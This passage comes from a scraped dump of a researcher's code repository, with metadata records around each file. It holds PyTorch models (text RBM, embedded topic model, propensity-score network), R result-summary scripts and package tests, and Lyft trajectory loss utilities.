map_location=\"cpu\")\nrbm = TextRBM(k=1)\nrbm.load_state_dict(ckpt_dict['model_state'])\n# device = utils.get_devices(config.gpu_ids)\n# rbm.to(device)\n\ndef get_rbm_output_from_batch(batch, vocab, use_cuda, device):\n \n docs_word_count = get_rbm_input_from_batch(batch, vocab, False, 'cpu').float()\n with torch.no_grad():\n _, sample_h = rbm.v_to_h(docs_word_count, docs_word_count.sum(-1).int())\n\n if use_cuda:\n sample_h = sample_h.to(device)\n\n return sample_h # B x latent_dim (200)\n" }, { "alpha_fraction": 0.7644991278648376, "alphanum_fraction": 0.76625657081604, "avg_line_length": 57.89655303955078, "blob_id": "582cad390472905f0f678d122b8bf3c68c839849", "content_id": "9718d0c2d2862ded055899b14b1dbcdb2830d659", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1707, "license_type": "no_license", "max_line_length": 212, "num_lines": 29, "path": "/textual_causality/etm-ps/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# ETM and Propensity Score Model\n\nThis folder contains python scripts for fitting the ETM model and the neural propensity score model. \n\n## Scripts\n- `args.py` specifies the arguments used in training and testing.\n- `data_utils.py` builds the CNNDM dataset.\n- `get_lens.py` loops over the whole CNNDM training set to get the document lengths, which is saved to `save/document_lengths.json`.\n- `get_ps.py` loops over the whole CNNDM training set to get the true propensity score dictionary, which is saved to `save/propensity_scores.json`.\n- `models.py` sets up the propensity score model structure and the ETM model structure.\n- `plot_lens.py` utilizes the document lengths generated by `get_lens.py` to plot the distribution of the lengths (saved to `save/doc_lens_hist.jpg`), so that we can have a better idea about the length threshold.\n- `run_etm.py` uses data parallelism to train the ETM model.\n- `run_ps.py` uses the weighted topic vector as the input to PSNet, which turns out to perform worse.\n- `run_ps2.py` uses the topic proportion vector as the input to PSNet, which has better prediction accuracy on the trainining and the validation set, so this model is the final model.\n- `test_ps2.py` applies the trained ETM model and the trained PSNet model to the training set to obtain the estimated propensity scores and generates the dataset (saved to `save/sim_data.py`) for simulation.\n- `utils.py` includes the utility functions for training and testing.\n\n\n## Training Details\nThe pink curves represent the PS model and the green curves represent PS2 model.\n\n### Training Loss\n![](save/train_loss.png)\n\n### Validation Accuracy\n![](save/val_accuracy.png)\n\n### Validation Loss\n![](save/val_loss.png)" }, { "alpha_fraction": 0.4941995441913605, "alphanum_fraction": 0.66434645652771, "avg_line_length": 29.785715103149414, "blob_id": "069b5cb6f639daae8894e85681a0bde237af925b", "content_id": "3a8f82e3a6ca1e0cb6676f448b096240ef7ad6b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 1293, "license_type": "no_license", "max_line_length": 98, "num_lines": 42, "path": "/imbCalib/package/imbCalib/tests/testthat/test-calibrate.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# simulated data for test\ny.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\ny.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n 0.27272727, 0.81818182, 0.63636364, 0.63636364)\n\n# load imbalance data\ndata(imbalance)\nset.seed(123)\nsplit <- sample.split(imbalance$y, SplitRatio = 0.75)\ntrain_set <- subset(imbalance, split == TRUE)\ntest_set <- subset(imbalance, split == FALSE)\nX.test <- subset(test_set, select = -y)\ny.test <- subset(test_set, select = y)[,1]\n\n\ntest_that(\"binProbs works\", {\n\n expect_equal(as.numeric(binProbs(y.true, y.prob)[[1]][1]), 1)\n expect_equal(as.numeric(binProbs(y.true, y.prob)[[2]][1]), 0.13636363499999998306)\n\n})\n\ntest_that(\"brier works\", {\n\n expect_equal(brier(y.true, y.prob), 0.41818181890909089660)\n\n})\n\ntest_that(\"stratifiedBrier works\", {\n\n expect_equal(stratifiedBrier(y.true, y.prob)[[1]], 0.41818181890909089660)\n expect_equal(stratifiedBrier(y.true, y.prob)[[2]], 0.53925619983471062557)\n expect_equal(stratifiedBrier(y.true, y.prob)[[3]], 0.33746556495867768843)\n\n})\n\ntest_that(\"bagCalibrate's output has the same length as y.test\", {\n\n expect_equal(length(bagCalibrate(train_set, X.test, 'y', model='svm',\n type = 'C-classification', kernel = 'linear')), length(y.test))\n\n})\n" }, { "alpha_fraction": 0.4687179625034332, "alphanum_fraction": 0.482051283121109, "avg_line_length": 39.64583206176758, "blob_id": "27d6b971b94c7c667a53e9c33d476be7c1d0e7a7", "content_id": "f8e43d31fd5e5be105a346f25f474b351c3744ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 1950, "license_type": "no_license", "max_line_length": 80, "num_lines": 48, "path": "/textual_causality/ate/get_ate_summary.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "library(dplyr)\n\nget.res.print <- function(ate_res, save_path) {\n ate_res_print <- as.data.frame(ate_res) %>% \n group_by(Setting, alpha, beta, gamma) %>%\n summarise(y.mean.sd = sd(y.mean),\n y.mean = mean(y.mean), \n Truth = mean(Truth), \n Unadjusted.sd = sd(Unadjusted), \n Unadjusted = mean(Unadjusted), \n PSReg.sd = sd(PSReg), \n PSReg = mean(PSReg), \n PSS.sd = sd(PSS),\n PSS = mean(PSS), \n IPW.sd = sd(IPW), \n IPW = mean(IPW), \n IPW2.sd = sd(IPW2),\n IPW2 = mean(IPW2)) %>%\n mutate(y.mean = paste(round(y.mean, 4), \"(\", \n round(y.mean.sd, 5), \")\", sep = \"\"), \n Truth = round(Truth, 4), \n Unadjusted = paste(round(Unadjusted, 4), \"(\", \n round(Unadjusted.sd, 5), \")\", sep = \"\"), \n PSReg = paste(round(PSReg, 4), \"(\", \n round(PSReg.sd, 5), \")\", sep = \"\"), \n PSS = paste(round(PSS, 4), \"(\", \n round(PSS.sd, 5), \")\", sep = \"\"), \n IPW = paste(round(IPW, 4), \"(\", \n round(IPW.sd, 5), \")\", sep = \"\"), \n IPW2 = paste(round(IPW2, 4), \"(\", \n round(IPW2.sd, 5), \")\", sep = \"\") \n ) %>% \n select(alpha, beta, gamma, y.mean, Truth, Unadjusted, PSReg, PSS, IPW, IPW2)\n \n ate_res_print <- as.data.frame(ate_res_print)\n rownames(ate_res_print) <- paste(\"Setting\", ate_res_print$Setting)\n ate_res_print <- ate_res_print[, 2:ncol(ate_res_print)]\n write.csv(ate_res_print, file = save_path)\n}\n\n\nate_res <- read.csv(\"../results/ate_results.csv\")\nate_res <- ate_res[, 2:ncol(ate_res)]\nget.res.print(ate_res, \"../results/ate_results_print.csv\")\n\nate_res <- read.csv(\"../results/ate_results2.csv\")\nate_res <- ate_res[, 2:ncol(ate_res)]\nget.res.print(ate_res, \"../results/ate_results_print2.csv\")" }, { "alpha_fraction": 0.5363464951515198, "alphanum_fraction": 0.5495291948318481, "avg_line_length": 35.875, "blob_id": "c0b98096c04e1947ed4c41cecedc69186e242260", "content_id": "eca0c489ed51a0bfd1dc195e781a29f42e1d1787", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2655, "license_type": "permissive", "max_line_length": 217, "num_lines": 72, "path": "/rbm_summarizer/train_textRBM/textRBM.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\n\n\n\nclass TextRBM(nn.Module):\n def __init__(self,\n n_vis=15000,\n n_hin=200,\n k=1,\n device='cpu'):\n super(TextRBM, self).__init__()\n self.W = nn.Parameter(torch.randn(n_hin,n_vis)*1e-2)\n self.v_bias = nn.Parameter(torch.zeros(n_vis))\n self.h_bias = nn.Parameter(torch.zeros(n_hin))\n self.k = k\n self.device=device\n\n def sample_bernoulli(self,p):\n # p can be a tensor of any size\n return F.relu(torch.sign(p - Variable(torch.rand(p.size())).to(self.device))) # draw binary samples with p being the probablity of being 1, we can also use bernoulli, this implementation is just more bottom.\n # return torch.distributions.Bernoulli(p).sample()\n \n def sample_multinomial(self, p):\n # p should be a tensor of dimension (K,) with sum = 1\n # check my notes for detailed algorithm\n p = torch.cat((torch.Tensor([0]).to(self.device), p), 0)\n c = torch.cumsum(p, dim=0)\n g = F.relu(torch.sign(c - Variable(torch.rand(1)).to(self.device)))\n\n return (1 - g[:-1]) * g[1:]\n # return torch.distributions.Multinomial(1, p).sample()\n\n def v_to_h(self,v, d):\n p_h = torch.sigmoid(F.linear(v, self.W) + \\\n torch.mm(d.float().unsqueeze(-1), self.h_bias.unsqueeze(0)))\n sample_h = self.sample_bernoulli(p_h)\n return p_h,sample_h\n\n def h_to_v(self,h, d):\n p_v = torch.nn.Softmax(dim=-1)(F.linear(h,self.W.t(),self.v_bias))\n sample_v = torch.stack([torch.stack([self.sample_multinomial(p_v_i) for _ in range(d_i)]).sum(0) for (p_v_i, d_i) in zip(p_v, d)])\n return p_v,sample_v\n \n def forward(self,v):\n with torch.no_grad():\n v = v.float()\n d = v.sum(-1).int()\n p_h1,h1 = self.v_to_h(v, d)\n \n h_ = h1\n for _ in range(self.k):\n p_v_,v_ = self.h_to_v(h_, d)\n p_h_,h_ = self.v_to_h(v_, d)\n \n return v,v_\n\n def free_energy(self,v):\n v = v.float()\n d = v.sum(-1).int()\n vbias_term = v.mv(self.v_bias) # torch.mv() performs a matrix-vector product\n wx_b = F.linear(v, self.W) + \\\n torch.mm(d.float().unsqueeze(-1), self.h_bias.unsqueeze(0))\n # hidden_term = wx_b.exp().add(1).log().sum(1)\n hidden_term = F.softplus(wx_b).sum(1) # for numerical stability\n\n return (-hidden_term - vbias_term).mean()\n" }, { "alpha_fraction": 0.7072649598121643, "alphanum_fraction": 0.7158119678497314, "avg_line_length": 43.619049072265625, "blob_id": "50bd3e05d3a5e616f5283e8aa9847ae1af197f56", "content_id": "f4944c3afa114ad17d7feb5e15acf016b65be4a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 936, "license_type": "no_license", "max_line_length": 117, "num_lines": 21, "path": "/textual_causality/etm-ps/get_lens.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"This file is to get the document length distribution.\"\"\"\nfrom transformers import RobertaTokenizer\nfrom functools import partial\nfrom data_utils import collate_mp, CNNDM\nfrom torch.utils.data import DataLoader\nfrom collections import OrderedDict\nimport json\n\nif __name__ == \"__main__\":\n\n tok = RobertaTokenizer.from_pretrained(\"roberta-base\")\n train_dataset = CNNDM(f\"/home/yang6367/summarizer/cnn-dailymail/processed/train\", \"roberta-base\", is_test=False)\n collate_fn = partial(collate_mp, pad_token_id=tok.pad_token_id, vocab_size=tok.vocab_size, is_test=False)\n train_dataloader = DataLoader(train_dataset, batch_size=256, shuffle=False, num_workers=4, collate_fn=collate_fn)\n \n doc_lens = OrderedDict()\n for batch in train_dataloader:\n doc_lens.update(zip(batch[\"text_ids\"], batch[\"src_input_lens\"]))\n \n with open('save/document_lengths.json', 'w') as fp:\n json.dump(doc_lens, fp)" }, { "alpha_fraction": 0.7833333611488342, "alphanum_fraction": 0.7833333611488342, "avg_line_length": 14, "blob_id": "966f199860357d53c84999e454b91a261052bfa3", "content_id": "5dfb9a9dff7e26097c011ece41c215d56bb79866", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 60, "license_type": "no_license", "max_line_length": 22, "num_lines": 4, "path": "/imbCalib/package/imbCalib/tests/testthat.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "library(testthat)\nlibrary(imbCalib)\n\ntest_check(\"imbCalib\")\n" }, { "alpha_fraction": 0.5577870607376099, "alphanum_fraction": 0.5649867653846741, "avg_line_length": 37.4963493347168, "blob_id": "08f739bd3283f31e2d7bdcd0b85a12583ff9dc3e", "content_id": "539a7d97e8efb429c860254faac0ea4adf8d7d56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5278, "license_type": "no_license", "max_line_length": 118, "num_lines": 137, "path": "/textual_causality/etm-ps/models.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn.functional as F \nfrom torch import nn\nfrom torch.nn.modules.activation import ReLU, Sigmoid\nfrom torch.nn.modules.batchnorm import BatchNorm1d\n\nclass PSNet(nn.Module):\n def __init__(self, n_features, n_hidden_1=1000, n_hidden_2=300):\n super(PSNet, self).__init__()\n self.net = nn.Sequential(\n nn.Linear(n_features, n_hidden_1), \n nn.BatchNorm1d(n_hidden_1), \n nn.LeakyReLU(), \n nn.Linear(n_hidden_1, n_hidden_2), \n nn.BatchNorm1d(n_hidden_2), \n nn.LeakyReLU(), \n nn.Linear(n_hidden_2, 1), \n nn.Sigmoid()\n )\n \n def forward(self, x):\n return self.net(x)\n\nclass ETM(nn.Module):\n def __init__(self, num_topics, vocab_size, embed_size, vi_nn_hidden_size, \n theta_act, embeddings=None, enc_drop=0.5):\n super(ETM, self).__init__()\n\n ## define hyperparameters\n self.num_topics = num_topics\n self.vocab_size = vocab_size\n self.embed_size = embed_size\n self.vi_nn_hidden_size = vi_nn_hidden_size\n self.enc_drop = enc_drop\n self.nn_drop = nn.Dropout(enc_drop)\n self.theta_act = self.get_activation(theta_act)\n \n ## define the word embedding matrix \\rho\n if embeddings is None:\n self.rho = nn.Linear(embed_size, vocab_size, bias=False) # self.rho.weight: (vocab_size x embed_size)\n else:\n self.rho = nn.Parameter(embeddings.clone().float(), requires_grad=False)\n\n ## define the matrix containing the topic embeddings\n self.alphas = nn.Linear(embed_size, num_topics, bias=False) #nn.Parameter(torch.randn(embed_size, num_topics))\n \n ## define variational distribution for \\theta_{1:D} via amortizartion\n self.q_theta = nn.Sequential(\n nn.Linear(vocab_size, vi_nn_hidden_size, bias=True), \n self.theta_act,\n nn.Linear(vi_nn_hidden_size, vi_nn_hidden_size, bias=True),\n self.theta_act,\n )\n self.mu_q_theta = nn.Linear(vi_nn_hidden_size, num_topics, bias=True)\n self.logsigma_q_theta = nn.Linear(vi_nn_hidden_size, num_topics, bias=True) # log of variance\n\n def get_activation(self, act):\n if act == 'tanh':\n act = nn.Tanh()\n elif act == 'relu':\n act = nn.ReLU()\n elif act == 'softplus':\n act = nn.Softplus()\n elif act == 'rrelu':\n act = nn.RReLU()\n elif act == 'leakyrelu':\n act = nn.LeakyReLU()\n elif act == 'elu':\n act = nn.ELU()\n elif act == 'selu':\n act = nn.SELU()\n elif act == 'glu':\n act = nn.GLU()\n else:\n print('Defaulting to tanh activations...')\n act = nn.Tanh()\n return act \n\n def forward(self, normalized_bows=None, theta=None, beta_only=False):\n \n beta = self.get_beta() # (K x vocab_size)\n if beta_only: \n return beta\n\n if theta is None:\n theta, kld_theta = self.get_theta(normalized_bows)\n else:\n kld_theta = None\n\n preds = self.decode(theta, beta) # (batch_size x vocab_size)\n topic_feature = torch.mm(theta, self.alphas.weight) # (batch_size x embed_size)\n \n return beta, theta, kld_theta, preds, topic_feature\n\n def get_beta(self):\n try:\n logit = self.alphas(self.rho.weight) # (vocab_size x K) # torch.mm(self.rho, self.alphas)\n except:\n logit = self.alphas(self.rho)\n beta = F.softmax(logit, dim=0).transpose(1, 0) \n return beta # (K x vocab_size) \n\n def get_theta(self, normalized_bows):\n mu_theta, logsigma_theta, kld_theta = self.encode(normalized_bows)\n z = self.reparameterize(mu_theta, logsigma_theta) # (batch_size x K)\n theta = F.softmax(z, dim=-1) # (batch_size, K)\n return theta, kld_theta\n\n def encode(self, bows):\n \"\"\"Returns paramters of the variational distribution for \\theta.\n\n input: bows\n batch of bag-of-words...tensor of shape bsz x V\n output: mu_theta, log_sigma_theta\n \"\"\"\n q_theta = self.q_theta(bows) # (batch_size x vi_nn_hidden_size)\n if self.enc_drop > 0:\n q_theta = self.nn_drop(q_theta)\n mu_theta = self.mu_q_theta(q_theta) # (batch_size x K)\n logsigma_theta = self.logsigma_q_theta(q_theta) # (batch_size x K)\n kl_theta = -0.5 * torch.sum(1 + logsigma_theta - mu_theta.pow(2) - logsigma_theta.exp(), dim=-1).mean()\n return mu_theta, logsigma_theta, kl_theta\n\n def reparameterize(self, mu, logvar):\n \"\"\"Returns a sample from a Gaussian distribution via reparameterization.\n \"\"\"\n if self.training:\n std = torch.exp(0.5 * logvar) # (batch_size x K)\n eps = torch.randn_like(std) # N(0, 1) of dimension (batch_size x K) \n return eps.mul_(std).add_(mu) # will do elementwise multiplication and addition\n else:\n return mu\n\n def decode(self, theta, beta):\n res = torch.mm(theta, beta) # (batch_size x vocab_size)\n preds = torch.log(res+1e-6)\n return preds \n\n\n\n" }, { "alpha_fraction": 0.618087649345398, "alphanum_fraction": 0.624005913734436, "avg_line_length": 39.66165542602539, "blob_id": "30436d125f40c9d065cf5cd015199f6964642d56", "content_id": "0cb3129d0c4f45b692a4b9b8ba0e250acc049741", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5407, "license_type": "no_license", "max_line_length": 139, "num_lines": 133, "path": "/textual_causality/etm-ps/test_ps2.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"Test the Propensity Score model on CNNDM.\nBased on ps2 model.\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom transformers import RobertaTokenizer, RobertaModel\nfrom collections import OrderedDict\nfrom json import dumps\nfrom tqdm import tqdm\nimport os\nfrom functools import partial\n\nimport util\nfrom args import get_test_args\nfrom data_utils import collate_mp, CNNDM\nfrom models import ETM, PSNet\nimport json\nimport csv\n\n\ndef main(args):\n # Set up logging and devices\n args.save_dir = util.get_save_dir(args.save_dir, args.name, training=False)\n log = util.get_logger(args.save_dir, args.name)\n device = util.get_devices(args.gpu_ids)\n log.info(f'Args: {dumps(vars(args), indent=4, sort_keys=True)}')\n args.batch_size *= max(1, len(args.gpu_ids))\n args.sim_data_save_path = os.path.join(args.save_dir, 'sim_data.csv')\n\n # Get embeddings\n log.info('Loading embeddings...')\n tokenizer = RobertaTokenizer.from_pretrained(args.model_type, verbose = False)\n encoder = RobertaModel.from_pretrained(args.model_type)\n embeddings = encoder.embeddings.word_embeddings.weight # 50265 x 768\n embed_size = embeddings.size(1)\n vocab_size = tokenizer.vocab_size\n\n # Get data loader\n log.info('Building dataset...')\n dataset = CNNDM(os.path.join(args.data_dir, args.split), args.model_type, is_test = False)\n collate_fn = partial(collate_mp, pad_token_id = tokenizer.pad_token_id, \n vocab_size = vocab_size, is_test = False)\n data_loader = DataLoader(dataset, batch_size=args.batch_size, shuffle=False, \n num_workers=args.num_workers, collate_fn=collate_fn)\n\n # Get ETM\n log.info('Building ETM...')\n etm = ETM(args.num_topics, vocab_size, embed_size, args.vi_nn_hidden_size,\n args.theta_act, embeddings, args.enc_drop)\n log.info(f\"ETM: {etm}\")\n\n etm = nn.DataParallel(etm, args.gpu_ids)\n log.info(f'Loading ETM checkpoint from {args.etm_load_path}...')\n etm= util.load_model(etm, args.etm_load_path, args.gpu_ids, return_step=False)\n\n etm = etm.to(device)\n etm.eval()\n for param in etm.parameters():\n param.requires_grad = False\n\n # get PS model\n log.info('Building Propensity Neural Net Model...')\n model = PSNet(n_features=args.num_topics)\n model = nn.DataParallel(model, args.gpu_ids)\n log.info(f'Loading PSNet checkpoint from {args.ps_load_path}...')\n model = util.load_model(model, args.ps_load_path, args.gpu_ids, return_step=False)\n log.info(f\"PS Model: {model}\")\n model = model.to(device)\n model.eval()\n\n ## Set up simulation\n # load propensity score dictionary\n with open(args.ps_path) as fp:\n ps_dict = json.load(fp)\n log.info(f\"Propensity Score Dictionary: {ps_dict}\")\n\n # write the header of the simulation file\n with open(args.sim_data_save_path, 'w+', newline ='') as fp:\n write = csv.writer(fp)\n write.writerow([\"Treat\", \"True_PS\", \"Response\", \"Est_PS\"])\n\n # Test\n log.info(f'Evaluating on {args.split} split...')\n bce_meter = util.AverageMeter()\n acc_meter = util.AverageMeter()\n criterion = nn.BCELoss()\n\n with torch.no_grad(), tqdm(total=len(data_loader.dataset)) as progress_bar:\n for batch in data_loader:\n bows = batch[\"src_bows\"].to(device) # (batch_size x vocab_size)\n batch_size = bows.size(0)\n sums = bows.sum(1).unsqueeze(1) # (batch_size x 1)\n if args.bow_norm:\n normalized_bows = bows / sums # (batch_size x vocab_size)\n else:\n normalized_bows = bows\n \n _, theta, _, _, _ = etm(normalized_bows=normalized_bows) # (batch_size x K)\n output = model(theta).squeeze() # (batch_size, )\n src_input_lens = batch[\"src_input_lens\"].to(device)\n target = 1.0 * (src_input_lens > args.doc_len_threshold) # (batch_size, ), 1.0 to make it to float\n loss = criterion(output, target)\n pred = 1.0 * (output > 0.5)\n accuracy = (1.0 * (pred == target)).mean()\n\n bce_meter.update(loss.item(), batch_size)\n acc_meter.update(accuracy.item(), batch_size)\n\n # Log info\n progress_bar.update(batch_size)\n progress_bar.set_postfix(BCE=bce_meter.avg, \n ACC=acc_meter.avg)\n\n # Simulate data\n propensity_scores = torch.FloatTensor([ps_dict[f\"{typ}\"] for typ in batch['src_keywords_inclusion_types'].tolist()]).to(device)\n responses = torch.bernoulli(torch.sigmoid(args.alpha * target + args.beta * propensity_scores + args.gamma)) # (batch_size, )\n sim_data = torch.stack([target, propensity_scores, responses, output]).transpose(0, 1) # (batch_size x 4)\n with open(args.sim_data_save_path, 'a+', newline ='') as fp:\n write = csv.writer(fp)\n write.writerows(sim_data.tolist())\n \n results_list = [('BCE', bce_meter.avg), ('ACC', acc_meter.avg)]\n results = OrderedDict(results_list)\n \n # Log to console\n results_str = ', '.join(f'{k}: {v:05.2f}' for k, v in results.items())\n log.info(f'{args.split.title()} {results_str}')\n log.info(f\"The simulated data has been saved to '{args.sim_data_save_path}'.\")\n \n\nif __name__ == '__main__':\n main(get_test_args())" }, { "alpha_fraction": 0.637599527835846, "alphanum_fraction": 0.6476550698280334, "avg_line_length": 40.30232620239258, "blob_id": "ed6c37bf6e7b33d2e0588287a8bb8a3221c858ea", "content_id": "f0ea3568dc61cc10f20aaa8a4768168846eadbd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12431, "license_type": "no_license", "max_line_length": 130, "num_lines": 301, "path": "/lyft/utils.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# --- Function utils ---\n# Original code from https://github.com/lyft/l5kit/blob/20ab033c01610d711c3d36e1963ecec86e8b85b6/l5kit/l5kit/evaluation/metrics.py\nimport numpy as np\n\nimport torch\nfrom torch import Tensor\nimport logging\nimport os\nimport queue\nimport shutil\nimport random\nfrom tqdm import tqdm\n\nfrom models import LyftEffnet, LyftDensenet, LyftEffnetb7\n\ndef pytorch_neg_multi_log_likelihood_batch(\n gt: Tensor, pred: Tensor, confidences: Tensor, avails: Tensor, device\n) -> Tensor:\n \"\"\"\n Compute a negative log-likelihood for the multi-modal scenario.\n log-sum-exp trick is used here to avoid underflow and overflow, For more information about it see:\n https://en.wikipedia.org/wiki/LogSumExp#log-sum-exp_trick_for_log-domain_calculations\n https://timvieira.github.io/blog/post/2014/02/11/exp-normalize-trick/\n https://leimao.github.io/blog/LogSumExp/\n Args:\n gt (Tensor): array of shape (bs)x(time)x(2D coords)\n pred (Tensor): array of shape (bs)x(modes)x(time)x(2D coords)\n confidences (Tensor): array of shape (bs)x(modes) with a confidence for each mode in each sample\n avails (Tensor): array of shape (bs)x(time) with the availability for each gt timestep\n Returns: \n Tensor: negative log-likelihood for this example, a single float number\n \"\"\"\n assert len(pred.shape) == 4, f\"expected 3D (MxTxC) array for pred, got {pred.shape}\"\n batch_size, num_modes, future_len, num_coords = pred.shape\n\n assert gt.shape == (batch_size, future_len, num_coords), f\"expected 2D (Time x Coords) array for gt, got {gt.shape}\"\n assert confidences.shape == (batch_size, num_modes), f\"expected 1D (Modes) array for gt, got {confidences.shape}\"\n assert torch.allclose(torch.sum(confidences, dim=1), confidences.new_ones((batch_size,))), \"confidences should sum to 1\"\n assert avails.shape == (batch_size, future_len), f\"expected 1D (Time) array for gt, got {avails.shape}\"\n # assert all data are valid\n assert torch.isfinite(pred).all(), \"invalid value found in pred\"\n assert torch.isfinite(gt).all(), \"invalid value found in gt\"\n assert torch.isfinite(confidences).all(), \"invalid value found in confidences\"\n assert torch.isfinite(avails).all(), \"invalid value found in avails\"\n\n # convert to (batch_size, num_modes, future_len, num_coords)\n gt = torch.unsqueeze(gt, 1) # add modes\n avails = avails[:, None, :, None] # add modes and cords\n\n # error (batch_size, num_modes, future_len)\n error = torch.sum(((gt - pred) * avails) ** 2, dim=-1) # reduce coords and use availability\n\n with np.errstate(divide=\"ignore\"): # when confidence is 0 log goes to -inf, but we're fine with it\n # error (batch_size, num_modes)\n error = torch.log(confidences) - 0.5 * torch.sum(error, dim=-1) # reduce time\n\n # use max aggregator on modes for numerical stability\n # error (batch_size, num_modes)\n max_value, _ = error.max(dim=1, keepdim=True) # error are negative at this point, so max() gives the minimum one\n error = -torch.log(torch.sum(torch.exp(error - max_value), dim=-1, keepdim=True)) - max_value # reduce modes\n # print(\"error\", error)\n return torch.mean(error)\n\n\ndef weighted_pytorch_neg_multi_log_likelihood_batch(\n gt: Tensor, pred: Tensor, confidences: Tensor, avails: Tensor, device\n) -> Tensor:\n \"\"\"\n Compute a negative log-likelihood for the multi-modal scenario.\n log-sum-exp trick is used here to avoid underflow and overflow, For more information about it see:\n https://en.wikipedia.org/wiki/LogSumExp#log-sum-exp_trick_for_log-domain_calculations\n https://timvieira.github.io/blog/post/2014/02/11/exp-normalize-trick/\n https://leimao.github.io/blog/LogSumExp/\n Args:\n gt (Tensor): array of shape (bs)x(time)x(2D coords)\n pred (Tensor): array of shape (bs)x(modes)x(time)x(2D coords)\n confidences (Tensor): array of shape (bs)x(modes) with a confidence for each mode in each sample\n avails (Tensor): array of shape (bs)x(time) with the availability for each gt timestep\n Returns: \n Tensor: negative log-likelihood for this example, a single float number\n \"\"\"\n assert len(pred.shape) == 4, f\"expected 3D (MxTxC) array for pred, got {pred.shape}\"\n batch_size, num_modes, future_len, num_coords = pred.shape\n\n assert gt.shape == (batch_size, future_len, num_coords), f\"expected 2D (Time x Coords) array for gt, got {gt.shape}\"\n assert confidences.shape == (batch_size, num_modes), f\"expected 1D (Modes) array for gt, got {confidences.shape}\"\n assert torch.allclose(torch.sum(confidences, dim=1), confidences.new_ones((batch_size,))), \"confidences should sum to 1\"\n assert avails.shape == (batch_size, future_len), f\"expected 1D (Time) array for gt, got {avails.shape}\"\n # assert all data are valid\n assert torch.isfinite(pred).all(), \"invalid value found in pred\"\n assert torch.isfinite(gt).all(), \"invalid value found in gt\"\n assert torch.isfinite(confidences).all(), \"invalid value found in confidences\"\n assert torch.isfinite(avails).all(), \"invalid value found in avails\"\n\n # convert to (batch_size, num_modes, future_len, num_coords)\n gt = torch.unsqueeze(gt, 1) # add modes\n avails = avails[:, None, :, None] # add modes and cords\n\n # error (batch_size, num_modes, future_len)\n error = torch.sum(((gt - pred) * avails) ** 2, dim=-1) # reduce coords and use availability\n\n ##===== add weights ======##\n weights = torch.Tensor([1.012 ** i for i in range(future_len)]).to(device)\n # add softmax to normalize, and then scale up\n weights = torch.nn.functional.softmax(weights) * future_len\n weights = weights.repeat(batch_size, num_modes, 1)\n error = error * weights\n ##========================##\n\n with np.errstate(divide=\"ignore\"): # when confidence is 0 log goes to -inf, but we're fine with it\n # error (batch_size, num_modes)\n error = torch.log(confidences) - 0.5 * torch.sum(error, dim=-1) # reduce time\n\n # use max aggregator on modes for numerical stability\n # error (batch_size, num_modes)\n max_value, _ = error.max(dim=1, keepdim=True) # error are negative at this point, so max() gives the minimum one\n error = -torch.log(torch.sum(torch.exp(error - max_value), dim=-1, keepdim=True)) - max_value # reduce modes\n # print(\"error\", error)\n return torch.mean(error)\n\n\ndef pytorch_neg_multi_log_likelihood_single(\n gt: Tensor, pred: Tensor, avails: Tensor\n) -> Tensor:\n \"\"\"\n\n Args:\n gt (Tensor): array of shape (bs)x(time)x(2D coords)\n pred (Tensor): array of shape (bs)x(time)x(2D coords)\n avails (Tensor): array of shape (bs)x(time) with the availability for each gt timestep\n Returns:\n Tensor: negative log-likelihood for this example, a single float number\n \"\"\"\n # pred (bs)x(time)x(2D coords) --> (bs)x(mode=1)x(time)x(2D coords)\n # create confidence (bs)x(mode=1)\n batch_size, future_len, num_coords = pred.shape\n confidences = pred.new_ones((batch_size, 1))\n return pytorch_neg_multi_log_likelihood_batch(gt, pred.unsqueeze(1), confidences, avails)\n\n\ndef get_logger(log_dir, name):\n class StreamHandlerWithTQDM(logging.Handler):\n \"\"\"Let `logging` print without breaking `tqdm` progress bars.\n\n See Also:\n > https://stackoverflow.com/questions/38543506\n \"\"\"\n def emit(self, record):\n try:\n msg = self.format(record)\n tqdm.write(msg)\n self.flush()\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n \n # create the logger\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n # file handler\n log_path = os.path.join(log_dir, \"log.txt\")\n file_handler = logging.FileHandler(log_path)\n file_handler.setLevel(logging.DEBUG)\n\n # console handler\n console_handler = StreamHandlerWithTQDM()\n console_handler.setLevel(logging.INFO)\n\n # set format\n file_formatter = logging.Formatter('[%(asctime)s] %(message)s', \\\n datefmt='%m.%d.%y %H:%M:%S')\n file_handler.setFormatter(file_formatter)\n console_formatter = logging.Formatter('[%(asctime)s] %(message)s', \\\n datefmt='%m.%d.%y %H:%M:%S')\n console_handler.setFormatter(console_formatter)\n\n # add handlers to the logger\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n return logger\n \n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n 